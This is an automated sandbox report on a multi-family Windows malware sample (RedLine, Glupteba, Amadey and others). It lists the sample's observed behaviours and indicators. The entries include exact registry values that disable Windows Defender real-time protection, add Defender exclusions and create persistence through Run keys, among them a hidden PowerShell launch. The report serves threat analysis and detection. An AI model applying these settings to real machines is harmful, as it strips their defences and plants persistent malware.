Malware Analysis Report

2025-08-10 21:53

Sample ID 231025-fgrqssfb41
Target e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae
SHA256 e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan upx rootkit
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae

Threat Level: Known bad

The file e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan upx rootkit

Glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess

Detect ZGRat V1

Raccoon

Windows security bypass

Detected google phishing page

RedLine payload

DcRat

Amadey

SmokeLoader

ZGRat

Raccoon Stealer payload

Glupteba payload

Modifies Windows Defender Real-time Protection settings

RedLine

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Drops file in Drivers directory

Stops running service(s)

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

UPX packed file

Checks BIOS information in registry

Reads user/profile data of web browsers

Unexpected DNS network traffic destination

Windows security modification

Checks computer location settings

Drops Chrome extension

Drops desktop.ini file(s)

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Checks installed software on the system

Drops file in System32 directory

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Checks SCSI registry key(s)

Suspicious behavior: MapViewOfSection

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious behavior: CmdExeWriteProcessMemorySpam

Runs net.exe

Suspicious behavior: LoadsDriver

Creates scheduled task(s)

Modifies Internet Explorer settings

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-25 04:50

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-25 04:50

Reported

2023-10-25 04:57

Platform

win7-20231023-en

Max time kernel

226s

Max time network

303s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

Detected google phishing page

phishing google

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FB51.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\18A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1441.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B2E2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C135.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\K.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F753.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\317.exe N/A
N/A N/A C:\Program Files (x86)\MyBurn\MyBurn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1bs92YJ6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2CQ7657.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3zj66Wk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4ST961YO.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5tZ8WP7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\6If0Yv8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1Dk37rF7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Jf821dM.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9D8D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSD7D8.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\set16.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos2.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Unexpected DNS network traffic destination

Description Indicator Process Target
Destination IP 51.159.66.125 N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\D5D.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\D2D9.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\mP9Sj06.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\sq1VZ08.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\mv6FC02.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\va5Ca30.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\vk8qw0bZ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\TM0pC3TM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\YD6bx5XP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e82947097dd2700b1d14eb33d3de85751a7786332b5c657824792cc1941e1eae.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3618187007-3650799920-3290345941-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\B2E2.exe'\"" C:\Users\Admin\AppData\Local\Temp\B2E2.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSDBEE.tmp\Install.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\QrgcvHR.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\MyBurn\is-C510B.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-CNM1D.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\is-JV5IE.tmp C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
File created C:\Program Files (x86)\MyBurn\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-GN92K.tmp\is-6U04H.tmp N/A
